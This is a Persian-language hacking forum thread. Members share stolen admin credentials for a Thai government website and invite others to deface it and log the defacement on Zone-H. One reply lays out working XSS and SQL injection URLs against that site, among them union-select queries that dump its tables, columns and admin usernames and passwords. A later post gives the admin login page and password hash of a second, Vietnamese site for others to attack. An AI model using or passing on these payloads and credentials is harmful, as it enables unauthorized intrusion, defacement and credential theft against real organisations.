discord icon
سرور دیسکورد گاردایران

پست های پیشنهاد شده

سلام دوستان من یک سایت رو زدم ولی هر کاری می کنم تو زون اچ ایرانی ثبت نمیشه ارور 500 سرور میده 

یوزر پسورد رو میزارم می تونید برید به اسم خودتون دیفیس کنید و ثبتش کنید شاید سایت منو بلاک کرده باشه 

در هر صورت 

ادرس سایت : https://www.sukhothai1.go.th

یوزر : Zed

پسورد : HackerZed

ادرس پیج ادمین :https://www.sukhothai1.go.th/_admin/

 

می تونید شل اپ کنید مث دیفیس کنید یا دیفیس هاتون رو تست کنید 

 

 

Capture.thumb.PNG.a8fb3ab4836e5ff47bb715e2e439b5ed.PNG

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام 

میدونم سر همرو تو انجمن به درد آوردم 🙂 

ولی خب میخوام یادبگیرم میشه بگی دقیقا چطور هک کردی باگ اسکیو ال اینا داشت؟ یا بروت فورس بود؟ کلن چطوری کردی؟

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 3 ساعت قبل، Mr.Night گفته است :

میدونم سر همرو تو انجمن به درد آوردم 🙂 

ولی خب میخوام یادبگیرم میشه بگی دقیقا چطور هک کردی باگ اسکیو ال اینا داشت؟ یا بروت فورس بود؟ کلن چطوری کردی؟

سوال پرسیدن که عیب نیست! سوال خوبی هم پرسیدید شاید بقیه دوستان هم این سوال رو داشته باشند! 

 

خب ببینید شما خودتون میتونید تست کنید مثلا من اومدم یکی از لینک های سایت رو که پارامتر دهی انجام شده بود انتخاب کردم یعنی این :

https://sukhothai1.go.th/data_1.php?id_group=411&name_group=-%3E%A2%E9%CD%C1%D9%C5%E0%AA%D4%A7%CA%B6%D4%B5%E0%C3%D7%E8%CD%A7%C3%E9%CD%A7%E0%C3%D5%C2%B9%A1%D2%C3%B7%D8%A8%C3%D4%B5%E1%C5%D0%BB%C3%D0%BE%C4%B5%D4%C1%D4%AA%CD%BA%BB%C3%D0%A8%D3%BB%D5

 

 

خب متغیر name_group داره تایتل رو مشخص میکنه که بعد از تست کردن متوجه باگ XSS شدم: 

https://sukhothai1.go.th/data_1.php?id_group=411&name_group=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E

 

 

 

بعد به متغیر id_group دقت کنید که احتمال وجود SQL Injection هم هست و بعد از تست کردن متوجه وجود باگ شدم:

https://sukhothai1.go.th/data_1.php?id_group=-411+union+select+1,2,3,4,5,6,7,database(),9,10,11,12,13,14--&name_group=s

 

لینک های دیگر: 

Tables: https://sukhothai1.go.th/data_1.php?id_group=-411+union+select+1,2,3,4,5,6,7,group_concat(table_name,%27%3Cbr%3E%27),9,10,11,12,13,14+from+information_schema.tables+where+table_schema=database()--&name_group=s
Columns: https://sukhothai1.go.th/data_1.php?id_group=-411+union+select+1,2,3,4,5,6,7,group_concat(column_name,%27%3Cbr%3E%27),9,10,11,12,13,14+from+information_schema.columns+where+table_name=%27admin%27--&name_group=s
Informations: https://sukhothai1.go.th/data_1.php?id_group=-411+union+select+1,2,3,4,5,6,7,group_concat(user,0x3a,pass,%27%3Cbr%3E%27),9,10,11,12,13,14+from+admin--&name_group=s

 

 

موفق و پیروز باشید.

 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 4 ساعت قبل، Mr.Night گفته است :

سلام 

میدونم سر همرو تو انجمن به درد آوردم 🙂 

ولی خب میخوام یادبگیرم میشه بگی دقیقا چطور هک کردی باگ اسکیو ال اینا داشت؟ یا بروت فورس بود؟ کلن چطوری کردی؟

سلام 

همون طوری که دوست خوبمون @MR.MSA گفتن سوال خوبی پرسیدید 

من این سایت رو با استفاده از باگ sql هک کردم 

اگر خودتون به باگ وارد هستید که خیلی خوب هست اگر هم اطلاعاتی ندارید می تونید داخل سایت های بگردید یا به من پیام  بدید خوش حال میشم کمکتون کنم

( باگ های : sql , xss , rfu , xml , cors , LFI , . . . )

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

سلام یک سایت جدید اوردم براتون

user : khaitri

password (hash) : 03d65e8f568d2eb359268b8634fa4e14

page admin : http://www.dienmaykhaitri.com.vn/admin/login.php

برید حالش رو ببرید 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در هم اکنون، Zed گفته است :

سلام یک سایت جدید اوردم براتون

user : khaitri

password (hash) : 03d65e8f568d2eb359268b8634fa4e14

page admin : http://www.dienmaykhaitri.com.vn/admin/login.php

برید حالش رو ببرید 

خطای 503 میده

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر
در 6 ساعت قبل، Mr.Night گفته است :

درست شد ممنون

خواهش می کنم

لطفا اگر مشکی بود داخل پیام ها بگید اینجوری اسپم میشه 

موفق باشید

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

برای ارسال دیدگاه یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید دیدگاهی ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در سایت ما ثبت نام کنید. عضویت خیلی ساده است !

ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید

ورود به حساب کاربری